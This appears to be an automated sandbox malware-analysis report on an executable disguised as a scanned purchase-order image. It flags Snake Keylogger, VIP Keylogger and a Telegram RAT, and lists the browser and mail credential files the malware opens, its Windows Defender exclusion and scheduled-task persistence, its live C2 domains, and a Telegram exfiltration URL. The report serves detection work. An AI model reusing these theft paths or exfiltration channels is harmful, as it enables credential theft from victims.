                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 1260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 1260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 1260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7448, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS11
                  Security Software Discovery                  		Distributed Component Object Model1
                  Email Collection                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSH1
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541880 Sample: Scan_Rev 20220731_PO&OC#88S... Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 42 reallyfreegeoip.org 2->42 44 api.telegram.org 2->44 46 4 other IPs or domains 2->46 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 64 17 other signatures 2->64 8 Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe 7 2->8         started        12 HJnkiZjAPsec.exe 5 2->12         started        signatures3 60 Tries to detect the country of the analysis system (by using the IP) 42->60 62 Uses the Telegram API (likely for C&C communication) 44->62 process4 file5 34 C:\Users\user\AppData\...\HJnkiZjAPsec.exe, PE32 8->34 dropped 36 C:\Users\...\HJnkiZjAPsec.exe:Zone.Identifier, ASCII 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmpB8C6.tmp, XML 8->38 dropped 40 Scan_Rev 20220731_...882874_JPEG.exe.log, ASCII 8->40 dropped 66 Adds a directory exclusion to Windows Defender 8->66 68 Injects a PE file into a foreign processes 8->68 14 Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        70 Antivirus detection for dropped file 12->70 72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 22 HJnkiZjAPsec.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 48 api.telegram.org 149.154.167.220, 443, 49770, 49778 TELEGRAMRU United Kingdom 14->48 50 kafs.co.ug 104.243.33.38, 49779, 49780, 587 RELIABLESITEUS United States 14->50 52 2 other IPs or domains 14->52 76 Loading BitLocker PowerShell Module 18->76 26 WmiPrvSE.exe 18->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal browser information (history, passwords, etc) 22->80 32 conhost.exe 24->32         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe50%ReversingLabsWin32.Trojan.CrypterX
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe100%AviraHEUR/AGEN.1304549
                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe100%AviraHEUR/AGEN.1304549
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe50%ReversingLabsWin32.Trojan.CrypterX

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  kafs.co.ug
                  		104.243.33.38
                  		truetrue
                    		unknown
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truetrue
                      		unknown
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown
                        checkip.dyndns.com
                        		193.122.130.0
                        		truefalse
                          		unknown
                          mail.kafs.co.ug
                          		unknown
                          		unknowntrue
                            		unknown
                            checkip.dyndns.org
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                                		unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                                  		unknown
                                  https://reallyfreegeoip.org/xml/173.254.250.81false
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.fontbureau.com/designersGScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/?Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/bTheScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.orgScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.telegram.org/botScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.fontbureau.com/designers?Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.office.com/lBScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D90000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.office.com/HScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.tiro.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.goodfont.co.krScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://chrome.google.com/webstore?hl=enHJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://kafs.co.ugScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
